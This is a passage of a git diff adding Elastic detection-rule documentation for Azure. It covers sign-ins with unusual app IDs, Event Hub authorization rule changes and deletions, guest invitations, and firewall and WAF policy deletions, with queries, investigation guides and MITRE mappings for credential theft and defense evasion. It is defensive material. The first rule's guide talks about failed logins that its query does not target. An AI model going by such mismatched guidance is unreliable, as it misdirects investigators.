credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity. + +**This is a New Terms rule that focuses on first occurrence of the client `azure.signinlogs.properties.app_id` requesting authentication on-behalf-of the principal user `azure.signinlogs.properties.user_principal_name` in the last 14-days.** + + +*Possible investigation steps* + + +- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process. +- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt. +- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks. +- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password. +- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account. +- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources. +- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. This can help identify if the failed attempts were due to policy enforcement or misconfiguration. + + +*False positive analysis* + + + +*Common benign scenarios* + +- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`. +- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`. +- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`. + + +*How to reduce false positives* + +- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`. +- Exlcude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication. +- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`. +- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert. + + +*Response and remediation* + + + +*Immediate actions* + +- Block the source IP address in `source.ip` if determined to be malicious. +- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies. +- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`. +- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks. +- Review conditional access policies to ensure they are correctly configured to block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. +- Review Conditional Access policies to enforce risk-based authentication and block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. + + +*Long-term mitigation* + +- Implement a zero-trust security model by enforcing least privilege access and continuous authentication. +- Regularly review and update conditional access policies to ensure they are effective against evolving threats. +- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`. +- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks. +- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.signinlogs" and event.category: "authentication" + and azure.signinlogs.properties.is_interactive: false + and azure.signinlogs.properties.user_type: "Member" + and not azure.signinlogs.properties.client_app_used: "Browser" + and not source.as.organization.name: "MICROSOFT-CORP-MSN-AS-BLOCK" + and not azure.signinlogs.properties.app_id: ( + "1b3c667f-cde3-4090-b60b-3d2abd0117f0" or + "26a7ee05-5602-4d76-a7ba-eae8b7b67941" or + "4b0964e4-58f1-47f4-a552-e2e1fc56dcd7" or + "ecd6b820-32c2-49b6-98a6-444530e5a77a" or + "268761a2-03f3-40df-8a8b-c3db24145b6b" or + "fc0f3af4-6835-4174-b806-f7db311fd2f3" or + "de50c81f-5f80-4771-b66b-cebd28ccdfc1" or + "ab9b8c07-8f02-4f72-87fa-80105867a763" or + "6f7e0f60-9401-4f5b-98e2-cf15bd5fd5e3" or + "d7b530a4-7680-4c23-a8bf-c52c121d2e87" or + "52c2e0b5-c7b6-4d11-a89c-21e42bcec444" or + "38aa3b87-a06d-4817-b275-7a316988d93b" or + "27922004-5251-4030-b22d-91ecd9a37ea4" or + "9ba1a5c7-f17a-4de9-a1f1-6178c8d51223" or + "cab96880-db5b-4e15-90a7-f3f1d62ffe39" or + "3a4d129e-7f50-4e0d-a7fd-033add0a29f4" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-event-hub-authorization-rule-created-or-updated.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-event-hub-authorization-rule-created-or-updated.asciidoc new file mode 100644 index 0000000000..d9df33d4b6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-event-hub-authorization-rule-created-or-updated.asciidoc @@ -0,0 +1,127 @@ +[[prebuilt-rule-8-19-8-azure-event-hub-authorization-rule-created-or-updated]] +=== Azure Event Hub Authorization Rule Created or Updated + +Identifies when an Event Hub Authorization Rule is created or updated in Azure. An authorization rule is associated with specific rights, and carries a pair of cryptographic keys. When you create an Event Hubs namespace, a policy rule named RootManageSharedAccessKey is created for the namespace. This has manage permissions for the entire namespace and it's recommended that you treat this rule like an administrative root account and don't use it in your application. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/event-hubs/authorize-access-shared-access-signature + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Log Auditing +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Event Hub Authorization Rule Created or Updated* + + +Azure Event Hub Authorization Rules manage access to Event Hubs via cryptographic keys, akin to administrative credentials. Adversaries may exploit these rules to gain unauthorized access or escalate privileges, potentially exfiltrating data. The detection rule monitors for the creation or modification of these rules, flagging successful operations to identify potential misuse or unauthorized changes. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the user or service principal associated with the operation by examining the `azure.activitylogs.operation_name` and `event.outcome` fields. +- Check the timestamp of the event to determine when the authorization rule was created or updated, and correlate this with any other suspicious activities around the same time. +- Investigate the specific Event Hub namespace affected by the rule change to understand its role and importance within the organization. +- Verify if the `RootManageSharedAccessKey` or any other high-privilege authorization rule was involved, as these carry significant risk if misused. +- Assess the necessity and legitimacy of the rule change by contacting the user or team responsible for the Event Hub namespace to confirm if the change was authorized and aligns with operational needs. +- Examine any subsequent access patterns or data transfers from the affected Event Hub to detect potential data exfiltration or misuse following the rule change. + + +*False positive analysis* + + +- Routine administrative updates to authorization rules by IT staff can trigger alerts. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows. +- Automated scripts or deployment tools that update authorization rules as part of regular operations may cause false positives. Identify these scripts and exclude their activity from alerts by filtering based on their service principal or user identity. +- Changes made by trusted third-party services integrated with Azure Event Hub might be flagged. Verify these services and exclude their operations by adding them to an allowlist. +- Frequent updates during development or testing phases can lead to false positives. Consider setting up separate monitoring profiles for development environments to reduce noise. +- Legitimate changes made by users with appropriate permissions might be misinterpreted as threats. Regularly review and update the list of authorized users to ensure only necessary personnel have access, and exclude their actions from alerts. + + +*Response and remediation* + + +- Immediately revoke or rotate the cryptographic keys associated with the affected Event Hub Authorization Rule to prevent unauthorized access. +- Review the Azure Activity Logs to identify any unauthorized access or data exfiltration attempts that may have occurred using the compromised authorization rule. +- Implement conditional access policies to restrict access to Event Hub Authorization Rules based on user roles and network locations. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data have been compromised. +- Conduct a security review of all Event Hub Authorization Rules to ensure that only necessary permissions are granted and that the RootManageSharedAccessKey is not used in applications. +- Enhance monitoring and alerting for changes to authorization rules by integrating with a Security Information and Event Management (SIEM) system to detect similar threats in the future. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/WRITE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Cloud Instance Metadata API +** ID: T1552.005 +** Reference URL: https://attack.mitre.org/techniques/T1552/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-event-hub-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-event-hub-deletion.asciidoc new file mode 100644 index 0000000000..130577a9b8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-event-hub-deletion.asciidoc @@ -0,0 +1,122 @@ +[[prebuilt-rule-8-19-8-azure-event-hub-deletion]] +=== Azure Event Hub Deletion + +Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about +* https://azure.microsoft.com/en-in/services/event-hubs/ +* https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-features + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Log Auditing +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Event Hub Deletion* + + +Azure Event Hub is a scalable data streaming platform and event ingestion service, crucial for processing large volumes of data in real-time. Adversaries may target Event Hubs to delete them, aiming to disrupt data flow and evade detection by erasing evidence of their activities. The detection rule monitors Azure activity logs for successful deletion operations, flagging potential defense evasion attempts by identifying unauthorized or suspicious deletions. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by checking the operation name "MICROSOFT.EVENTHUB/NAMESPACES/EVENTHUBS/DELETE" and ensure the event outcome is marked as Success. +- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs. +- Investigate the context of the deletion by reviewing recent activities performed by the identified user or service principal to determine if there are any other suspicious actions. +- Check for any recent changes in permissions or roles assigned to the user or service principal to assess if the deletion was authorized or if there was a potential privilege escalation. +- Correlate the deletion event with other security alerts or incidents in the environment to identify if this action is part of a larger attack pattern or campaign. +- Communicate with relevant stakeholders or teams to verify if the deletion was part of a planned operation or maintenance activity. + + +*False positive analysis* + + +- Routine maintenance or updates by authorized personnel can trigger deletion logs. Verify if the deletion aligns with scheduled maintenance activities and exclude these operations from alerts. +- Automated scripts or tools used for managing Azure resources might delete Event Hubs as part of their normal operation. Identify these scripts and whitelist their activity to prevent false positives. +- Test environments often involve frequent creation and deletion of resources, including Event Hubs. Exclude known test environments from monitoring to reduce noise. +- Changes in organizational policies or restructuring might lead to legitimate deletions. Ensure that such policy-driven deletions are documented and excluded from alerts. +- Misconfigured automation or deployment processes can inadvertently delete Event Hubs. Regularly review and update configurations to ensure they align with intended operations and exclude these from alerts if verified as non-threatening. + + +*Response and remediation* + + +- Immediately isolate the affected Azure Event Hub namespace to prevent further unauthorized deletions or modifications. This can be done by restricting access through Azure Role-Based Access Control (RBAC) and network security groups. +- Review and revoke any suspicious or unauthorized access permissions associated with the deleted Event Hub. Ensure that only authorized personnel have the necessary permissions to manage Event Hubs. +- Restore the deleted Event Hub from backups if available, or reconfigure it to resume normal operations. Verify the integrity and completeness of the restored data. +- Conduct a thorough audit of recent Azure activity logs to identify any other unauthorized actions or anomalies that may indicate further compromise. +- Escalate the incident to the security operations team for a detailed investigation into the root cause and to assess the potential impact on other Azure resources. +- Implement additional monitoring and alerting for Azure Event Hub operations to detect and respond to similar unauthorized activities promptly. +- Review and update security policies and access controls for Azure resources to prevent recurrence, ensuring adherence to the principle of least privilege. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.EVENTHUB/NAMESPACES/EVENTHUBS/DELETE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-external-guest-user-invitation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-external-guest-user-invitation.asciidoc new file mode 100644 index 0000000000..c83deafd01 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-external-guest-user-invitation.asciidoc @@ -0,0 +1,124 @@ +[[prebuilt-rule-8-19-8-azure-external-guest-user-invitation]] +=== Azure External Guest User Invitation + +Identifies an invitation to an external user in Azure Active Directory (AD). Azure AD is extended to include collaboration, allowing you to invite people from outside your organization to be guest users in your cloud account. Unless there is a business need to provision guest access, it is best practice avoid creating guest users. Guest users could potentially be overlooked indefinitely leading to a potential vulnerability. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/governance/policy/samples/cis-azure-1-1-0 + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure External Guest User Invitation* + + +Azure Active Directory (AD) facilitates collaboration by allowing external users to be invited as guest users, enhancing flexibility in cloud environments. However, adversaries may exploit this feature to gain unauthorized access, posing security risks. The detection rule monitors audit logs for successful external user invitations, flagging potential misuse by identifying unusual or unnecessary guest account creations. + + +*Possible investigation steps* + + +- Review the audit logs to confirm the details of the invitation event, focusing on the operation name "Invite external user" and ensuring the event outcome is marked as Success. +- Identify the inviter by examining the properties of the audit log entry, such as the initiator's user ID or email, to determine if the invitation was expected or authorized. +- Check the display name and other attributes of the invited guest user to assess if they align with known business needs or if they appear suspicious or unnecessary. +- Investigate the inviter's recent activity in Azure AD to identify any unusual patterns or deviations from their typical behavior that might indicate compromised credentials. +- Consult with relevant business units or stakeholders to verify if there was a legitimate business requirement for the guest user invitation and if it aligns with current projects or collaborations. +- Review the access permissions granted to the guest user to ensure they are limited to the minimum necessary for their role and do not expose sensitive resources. + + +*False positive analysis* + + +- Invitations for legitimate business partners or vendors may trigger alerts. Regularly review and whitelist known partners to prevent unnecessary alerts. +- Internal users with dual roles or responsibilities that require external access might be flagged. Maintain a list of such users and update it periodically to exclude them from alerts. +- Automated systems or applications that require guest access for integration purposes can cause false positives. Identify these systems and configure exceptions in the monitoring rules. +- Temporary projects or collaborations often involve inviting external users. Document these projects and set expiration dates for guest access to minimize false positives. +- Frequent invitations from specific departments, such as HR or Marketing, for events or collaborations can be common. Establish a process to verify and approve these invitations to reduce false alerts. + + +*Response and remediation* + + +- Immediately disable the guest user account identified in the alert to prevent any unauthorized access or activities. +- Review the audit logs to determine the source and context of the invitation, identifying the user or system that initiated the guest invitation. +- Notify the security team and relevant stakeholders about the unauthorized guest invitation for further investigation and potential escalation. +- Conduct a security assessment of the affected Azure AD environment to identify any other unauthorized guest accounts or suspicious activities. +- Implement conditional access policies to restrict guest user invitations to authorized personnel only, reducing the risk of future unauthorized invitations. +- Enhance monitoring and alerting for guest user invitations by integrating with a Security Information and Event Management (SIEM) system to ensure timely detection and response. +- Review and update the organization's Azure AD guest user policies to ensure they align with security best practices and business needs, minimizing unnecessary guest access. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Invite external user" and azure.auditlogs.properties.target_resources.*.display_name:guest and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-firewall-policy-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-firewall-policy-deletion.asciidoc new file mode 100644 index 0000000000..109eb45767 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-firewall-policy-deletion.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-8-azure-firewall-policy-deletion]] +=== Azure Firewall Policy Deletion + +Identifies the deletion of a firewall policy in Azure. An adversary may delete a firewall policy in an attempt to evade defenses and/or to eliminate barriers to their objective. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/firewall-manager/policy-overview + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Network Security Monitoring +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Firewall Policy Deletion* + + +Azure Firewall policies are crucial for managing and enforcing network security rules across Azure environments. Adversaries may target these policies to disable security measures, facilitating unauthorized access or data exfiltration. The detection rule monitors Azure activity logs for successful deletion operations of firewall policies, signaling potential defense evasion attempts by identifying specific operation names and outcomes. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by filtering for the operation name "MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE" and ensuring the event outcome is "Success". +- Identify the user or service principal responsible for the deletion by examining the 'caller' field in the activity logs. +- Check the timestamp of the deletion event to determine when the policy was deleted and correlate it with other security events or alerts around the same time. +- Investigate the context of the deletion by reviewing any related activities performed by the same user or service principal, such as modifications to other security settings or unusual login patterns. +- Assess the impact of the deletion by identifying which resources or networks were protected by the deleted firewall policy and evaluating the potential exposure or risk introduced by its removal. +- Contact the responsible user or team to verify if the deletion was authorized and part of a planned change or if it was unexpected and potentially malicious. + + +*False positive analysis* + + +- Routine maintenance or updates by authorized personnel can trigger the deletion event. Ensure that such activities are logged and verified by cross-referencing with change management records. +- Automated scripts or tools used for infrastructure management might delete and recreate firewall policies as part of their operation. Identify these scripts and exclude their activity from alerts by using specific identifiers or tags. +- Test environments often undergo frequent changes, including policy deletions. Consider excluding activity from known test environments by filtering based on resource group or subscription IDs. +- Scheduled policy updates or rotations might involve temporary deletions. Document these schedules and adjust monitoring rules to account for these expected changes. +- Ensure that any third-party integrations or services with permissions to modify firewall policies are accounted for, and their actions are reviewed and whitelisted if necessary. + + +*Response and remediation* + + +- Immediately isolate the affected Azure resources to prevent further unauthorized access or data exfiltration. This can be done by applying restrictive network security group (NSG) rules or using Azure Security Center to quarantine resources. +- Review Azure activity logs to identify the user or service principal responsible for the deletion. Verify if the action was authorized and investigate any suspicious accounts or credentials. +- Restore the deleted firewall policy from backups or recreate it using predefined templates to ensure that network security rules are reinstated promptly. +- Implement conditional access policies to enforce multi-factor authentication (MFA) for all users with permissions to modify or delete firewall policies, reducing the risk of unauthorized changes. +- Escalate the incident to the security operations team for further investigation and to determine if additional resources or systems have been compromised. +- Conduct a post-incident review to identify gaps in security controls and update incident response plans to address similar threats in the future. +- Enhance monitoring by configuring alerts for any future attempts to delete or modify critical security policies, ensuring rapid detection and response to potential threats. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc new file mode 100644 index 0000000000..4d10cb9322 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc @@ -0,0 +1,119 @@ +[[prebuilt-rule-8-19-8-azure-frontdoor-web-application-firewall-waf-policy-deleted]] +=== Azure Frontdoor Web Application Firewall (WAF) Policy Deleted + +Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in Azure. An adversary may delete a Frontdoor Web Application Firewall (WAF) Policy in an attempt to evade defenses and/or to eliminate barriers to their objective. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#networking + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Network Security Monitoring +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Frontdoor Web Application Firewall (WAF) Policy Deleted* + + +Azure Frontdoor WAF policies are crucial for protecting web applications by filtering and monitoring HTTP requests to block malicious traffic. Adversaries may delete these policies to bypass security measures, facilitating unauthorized access or data exfiltration. The detection rule identifies such deletions by monitoring Azure activity logs for specific delete operations, signaling potential defense evasion attempts. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by filtering for the operation name "MICROSOFT.NETWORK/FRONTDOORWEBAPPLICATIONFIREWALLPOLICIES/DELETE" and ensure the event outcome is marked as Success. +- Identify the user or service principal responsible for the deletion by examining the associated user identity information in the activity logs. +- Check the timestamp of the deletion event to determine if it coincides with any other suspicious activities or alerts in the environment. +- Investigate the context of the deletion by reviewing any recent changes or incidents involving the affected Azure Frontdoor instance or related resources. +- Assess the impact of the deletion by identifying which web applications were protected by the deleted WAF policy and evaluating their current exposure to threats. +- Review access logs and network traffic for the affected web applications to detect any unusual or unauthorized access attempts following the policy deletion. + + +*False positive analysis* + + +- Routine maintenance or updates by authorized personnel may lead to the deletion of WAF policies. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks. +- Automated scripts or tools used for infrastructure management might delete and recreate WAF policies as part of their normal operation. Identify these scripts and exclude their activity from triggering alerts. +- Changes in organizational policy or architecture could necessitate the removal of certain WAF policies. Document these changes and adjust the detection rule to account for them by excluding specific policy names or identifiers. +- Test environments may frequently add and remove WAF policies as part of development cycles. Consider excluding activity from test environments by filtering based on resource group names or tags associated with non-production environments. + + +*Response and remediation* + + +- Immediately isolate the affected Azure Frontdoor instance to prevent further unauthorized access or data exfiltration. +- Review Azure activity logs to identify the user or service principal responsible for the deletion and assess their access permissions. +- Recreate the deleted WAF policy using the latest backup or configuration template to restore security controls. +- Implement conditional access policies to restrict access to Azure management operations, ensuring only authorized personnel can modify WAF policies. +- Notify the security operations team and relevant stakeholders about the incident for further investigation and monitoring. +- Conduct a post-incident review to identify gaps in security controls and update incident response plans accordingly. +- Enhance monitoring by setting up alerts for any future deletions of critical security policies to ensure rapid detection and response. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.NETWORK/FRONTDOORWEBAPPLICATIONFIREWALLPOLICIES/DELETE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-full-network-packet-capture-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-full-network-packet-capture-detected.asciidoc new file mode 100644 index 0000000000..038f9d6e51 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-full-network-packet-capture-detected.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-8-azure-full-network-packet-capture-detected]] +=== Azure Full Network Packet Capture Detected + +Identifies potential full network packet capture in Azure. Packet Capture is an Azure Network Watcher feature that can be used to inspect network traffic. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + 